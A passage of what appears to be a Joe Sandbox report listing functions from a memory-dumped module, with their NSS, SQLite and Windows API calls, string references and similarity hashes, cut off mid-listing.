MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C84263B
_wopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,0000010A,00000000,?,000000FF,00000000,00000000), ref: 6C84264A
free.MOZGLUE(00000000,?,?,00000000), ref: 6C842656
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C92DEB8), ref: 6C842676
_close.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,00000000), ref: 6C842684
free.MOZGLUE(00000000,?,000000FF,00000000,00000000), ref: 6C84268D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_close_fdopen_wopenmalloc
String ID:
API String ID: 3511306438-0
Opcode ID: 9847a2e681e11b58caac7d57efbe2e26bee896edda3cd70bfcbea555bd074394
Instruction ID: ecb870dfc5ad11562de9008e1962228e8480d102d5783e156017f194f8335ad6
Opcode Fuzzy Hash: 9847a2e681e11b58caac7d57efbe2e26bee896edda3cd70bfcbea555bd074394
Instruction Fuzzy Hash: 3711B6B17093162BFB2426659D4DA7B35ADFF81259F144A38FC1DC5681EF68CC1086A2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D65D0 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 261COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C7D670B
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C7D2B2C), ref: 6C7D675E
EnterCriticalSection.KERNEL32(?), ref: 6C7D678E
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,6C7D2B2C), ref: 6C7D67E1

Strings

winClose, xrefs: 6C7D68C5
winUnmapfile2, xrefs: 6C7D698B
winUnmapfile1, xrefs: 6C7D6964

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: winClose$winUnmapfile1$winUnmapfile2
API String ID: 3168844106-373099266
Opcode ID: 0a4aecd709b944eaa92e0e7258b0888303df06ec39846bff27056208177b82b6
Instruction ID: b835395d25d7d42607de1e812fb11d28ffab901b105093a920e0cb6536ee9615
Opcode Fuzzy Hash: 0a4aecd709b944eaa92e0e7258b0888303df06ec39846bff27056208177b82b6
Instruction Fuzzy Hash: 3EA19136B09210CBDF18AF64EA88A693771BB4631DF25443CE806DBA44DB34AE51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C764F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C764FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7651BB

Strings

%s at line %d of [%.10s], xrefs: 6C7651B4
misuse, xrefs: 6C7651AF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7651A5
unable to delete/modify user-function due to active statements, xrefs: 6C7651DF

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: ac078b72d5323d3c34ada47dd5bc18160ece4890c5a078ccf9ea39ae2fd7d533
Instruction ID: 63a75569d85ced66c77ee19794229fe4e3238b5762aa8a7879a41a6888a96122
Opcode Fuzzy Hash: ac078b72d5323d3c34ada47dd5bc18160ece4890c5a078ccf9ea39ae2fd7d533
Instruction Fuzzy Hash: 5A71BFB160420A9FDB04CE26EE80B9A77B5BF48348F084534FD199BE82D335EC50DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C77A630 Relevance: 10.7, APIs: 7, Instructions: 192COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,00000000,6C941308,?,?,6C776ABD,00000000), ref: 6C77A6B7
LeaveCriticalSection.KERNEL32(?), ref: 6C77A70A
EnterCriticalSection.KERNEL32(?,00000000,6C941308,?,?,6C776ABD,00000000), ref: 6C77A73A
LeaveCriticalSection.KERNEL32(?), ref: 6C77A78D
EnterCriticalSection.KERNEL32(?,00000000,6C941308,?,?,6C776ABD,00000000), ref: 6C77A7CA
LeaveCriticalSection.KERNEL32(?), ref: 6C77A821
sqlite3_free.NSS3(?,00000000,6C941308,?,?,6C776ABD,00000000), ref: 6C77A8A6

Part of subcall function 6C769EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C77C6FD,?,?,?,?,6C7CF965,00000000), ref: 6C769F0E
Part of subcall function 6C769EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C7CF965,00000000), ref: 6C769F5D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSection$EnterLeave$sqlite3_free
String ID:
API String ID: 1407842778-0
Opcode ID: 494254d54086b3c2e2c65cd226d8878b88c1d6f3512a050a2be88aa29e22b97d
Instruction ID: aec6ea9ada39eced57faef6d2097711b1d3d231ebc5f65ff0a0d89387b7d901f
Opcode Fuzzy Hash: 494254d54086b3c2e2c65cd226d8878b88c1d6f3512a050a2be88aa29e22b97d
Instruction Fuzzy Hash: FA618575608604CBEF29AF25E688A663371FB4732DB38553DD40647A40CB39E856CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D2D20 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C7D2D69

Strings

winTruncate2, xrefs: 6C7D2EF8
winSeekFile, xrefs: 6C7D2E9C
winUnmapfile2, xrefs: 6C7D2F7F
winUnmapfile1, xrefs: 6C7D2F55
winTruncate1, xrefs: 6C7D2EBE

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: __allrem
String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
API String ID: 2933888876-3221253098
Opcode ID: 7e1c934ba30bacdc65d9447ccf29569cffa1e136e04072a76c3cf2a33d586183
Instruction ID: a559a1a941c4b5040f805d7e38df9efb5125cd46add2adbcc2f30fd18a2e653c
Opcode Fuzzy Hash: 7e1c934ba30bacdc65d9447ccf29569cffa1e136e04072a76c3cf2a33d586183
Instruction Fuzzy Hash: C961AF71B042059FDB14DF68DD88AAA77B1FF49318F208538E919AB790DB31AD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C7E8620 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

SECITEM_CopyItem_Util.NSS3(00000000,00000000,6C7E7310,00000000,6C7E7310,?,?,00000004,?), ref: 6C7E8684

Part of subcall function 6C83FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C838D2D,?,00000000,?), ref: 6C83FB85
Part of subcall function 6C83FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C83FBB1

SECITEM_CopyItem_Util.NSS3(00000000,-0000000C,6C7E7304,?,?,?,00000000,6C7E7310,?,?,00000004,?), ref: 6C7E869F
PORT_ArenaAlloc_Util.NSS3(00000000,00000008,?,?,?,?,?,?,00000000,6C7E7310,?,?,00000004,?), ref: 6C7E86D7
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,6C7E7310,?,?,00000004,?), ref: 6C7E8706
PORT_ArenaAlloc_Util.NSS3(00000000,00000018,00000000,6C7E7310,00000004,00000000,?,6C7E8A20,00000004,00000000,6C7E7310,?,?,00000004,?), ref: 6C7E8656

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000008,00000000,6C7E7310,00000004,00000000,?,6C7E8A20,00000004,00000000,6C7E7310,?,?,00000004,?), ref: 6C7E8763
PORT_ArenaGrow_Util.NSS3(00000000,6C7E8A20,?,?,00000000,6C7E7310,00000004,00000000,?,6C7E8A20,00000004,00000000,6C7E7310,?,?,00000004), ref: 6C7E8795

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyGrow_Item_Value$AllocateCriticalEnterSectionUnlockmemcpy
String ID:
API String ID: 1239214001-0
Opcode ID: edab0757da17ce9ed80277259f892125aa72fc68a5204f4ba0abaa766cbc824c
Instruction ID: 17a8da15aedb85568e1a36a313eb51b97cc666f27680cd5516e9725aad65b0bb
Opcode Fuzzy Hash: edab0757da17ce9ed80277259f892125aa72fc68a5204f4ba0abaa766cbc824c
Instruction Fuzzy Hash: BB41E372900210AFE7108F6ECE00B6737A9EF55358F15867AEC158B751E771E904CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6C82AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C82AB3E,?,?,?), ref: 6C82AC35

Part of subcall function 6C80CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C80CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C82AB3E,?,?,?), ref: 6C82AC55

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C82AB3E,?,?), ref: 6C82AC70

Part of subcall function 6C80E300: TlsGetValue.KERNEL32 ref: 6C80E33C
Part of subcall function 6C80E300: EnterCriticalSection.KERNEL32(?), ref: 6C80E350
Part of subcall function 6C80E300: PR_Unlock.NSS3(?), ref: 6C80E5BC
Part of subcall function 6C80E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C80E5CA
Part of subcall function 6C80E300: TlsGetValue.KERNEL32 ref: 6C80E5F2
Part of subcall function 6C80E300: EnterCriticalSection.KERNEL32(?), ref: 6C80E606
Part of subcall function 6C80E300: PORT_Alloc_Util.NSS3(?), ref: 6C80E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C82AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C82AB3E), ref: 6C82ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C82AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C82AD2B

Part of subcall function 6C80F360: TlsGetValue.KERNEL32(00000000,?,6C82A904,?), ref: 6C80F38B
Part of subcall function 6C80F360: EnterCriticalSection.KERNEL32(?,?,?,6C82A904,?), ref: 6C80F3A0
Part of subcall function 6C80F360: PR_Unlock.NSS3(?,?,?,?,6C82A904,?), ref: 6C80F3D3

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 21cd3225ee4b429ad7b39e005b7515815e212b790adbf2fab41b87847b95e6b8
Instruction ID: 600fc7202fcd979002753e0df87ce0e0dcd6225e5475df69df422d97f63948d5
Opcode Fuzzy Hash: 21cd3225ee4b429ad7b39e005b7515815e212b790adbf2fab41b87847b95e6b8
Instruction Fuzzy Hash: F3315BB1E006095FEB248F69CD449EF77B6EF84328B198939E81497740EB34DC4587E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C808C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C808C7C

Part of subcall function 6C8A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DC6
Part of subcall function 6C8A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C8F0A27), ref: 6C8A9DD1
Part of subcall function 6C8A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C8A9DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C808CB0
TlsGetValue.KERNEL32 ref: 6C808CD1
EnterCriticalSection.KERNEL32(?), ref: 6C808CE5
PR_Unlock.NSS3(?), ref: 6C808D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C808D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C808D93

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 5f335c81d4a51c05bdcfac11ac2cf1039ecbc526eca639d05a57ad17336f57ca
Instruction ID: ab89a388c26be4de3a5ad850ba7abf2e81712139870ffae3775b1f5e3c450210
Opcode Fuzzy Hash: 5f335c81d4a51c05bdcfac11ac2cf1039ecbc526eca639d05a57ad17336f57ca
Instruction Fuzzy Hash: DA316C71B01205AFE7209F68DE4479A77B0BF15319F240A36EE1957B90D730A9A4C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 6C828500 Relevance: 10.6, APIs: 7, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C8295DC,00000000,00000000,00000000,?,6C8295DC,00000000,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C828517

Part of subcall function 6C83BE30: SECOID_FindOID_Util.NSS3(6C7F311B,00000000,?,6C7F311B,?), ref: 6C83BE44

PORT_NewArena_Util.NSS3(00000800,00000000,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C828585
PORT_ArenaAlloc_Util.NSS3(00000000,00000034,?,00000000,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C82859A
SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C90D8C4,6C8295D0,?,?,?,00000000,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C8285CC
SECOID_GetAlgorithmTag_Util.NSS3(-0000001C,?,?,?,?,?,?,?,00000000,00000000,?,6C807F4A,00000000,?,00000000,00000000), ref: 6C8285E1
PORT_FreeArena_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,00000000,00000000,?,6C807F4A,00000000,?), ref: 6C8285F4

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$AlgorithmArena_Tag_$Alloc_ArenaDecodeFindFreeItem_
String ID:
API String ID: 738345241-0
Opcode ID: a90cf829baf0df4fc06946254865e19e49995591612a4d378bbde5a1537222c2
Instruction ID: 9dd48994ddec4ca5a9ef635f64c941c2865b2c11dddb4443d7ec5dc671cb1c61
Opcode Fuzzy Hash: a90cf829baf0df4fc06946254865e19e49995591612a4d378bbde5a1537222c2
Instruction Fuzzy Hash: 573104A3D0111057FF3085588E8CF6A2219AB21798F150E77E809D7EC2EB1CCDD442E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7F4590 Relevance: 10.6, APIs: 7, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C7F45B5

Part of subcall function 6C840FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7E87ED,00000800,6C7DEF74,00000000), ref: 6C841000
Part of subcall function 6C840FF0: PR_NewLock.NSS3(?,00000800,6C7DEF74,00000000), ref: 6C841016
Part of subcall function 6C840FF0: PL_InitArenaPool.NSS3(00000000,security,6C7E87ED,00000008,?,00000800,6C7DEF74,00000000), ref: 6C84102B

PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C7F45C9

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7F45E6
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C7F45F8

Part of subcall function 6C83FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C838D2D,?,00000000,?), ref: 6C83FB85
Part of subcall function 6C83FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C83FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7F4647
SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C90A0F4,?), ref: 6C7F468C
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C7F46A1

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpymemset
String ID:
API String ID: 1594507116-0
Opcode ID: 13d8da3d351da2c4b861b4e31168cfa131c1b0eeee50daaf6d76c61e21c3a08f
Instruction ID: 86d51d42c89078307068fb8d2d57e864dc1b845cc616d7fc7c263c4ecb2d7671
Opcode Fuzzy Hash: 13d8da3d351da2c4b861b4e31168cfa131c1b0eeee50daaf6d76c61e21c3a08f
Instruction Fuzzy Hash: 2531E5B1B003149BFF208E58DE91BAF36A8AB46358F004438ED14DF785EB79C80987A5

Uniqueness

Uniqueness Score: -1.00%

Function 6C802E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C7FE728,?,00000038,?,?,00000000), ref: 6C802E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C802E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C802E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C802E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C802E9E
PR_Unlock.NSS3(?), ref: 6C802EAB
PR_Unlock.NSS3(?), ref: 6C802F0D

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 63ac9c5276cdbe746f3673b3d1b067b048839518a486bff184881190d48cc229
Instruction ID: 205e6de38e393a572fe674870fd24319a0cf0136d43eaac15d4953428c9791e4
Opcode Fuzzy Hash: 63ac9c5276cdbe746f3673b3d1b067b048839518a486bff184881190d48cc229
Instruction Fuzzy Hash: 9C31F6B6B005059BEB20AF28DD8887AB775EF45298F148675EC1887B11E731EC64C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C834470 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C7F7296,00000000), ref: 6C834487
EnterCriticalSection.KERNEL32(?,?,?,6C7F7296,00000000), ref: 6C8344A0
PR_Unlock.NSS3(?,?,?,?,6C7F7296,00000000), ref: 6C8344BB
SECMOD_DestroyModule.NSS3(?,?,?,?,6C7F7296,00000000), ref: 6C8344DA
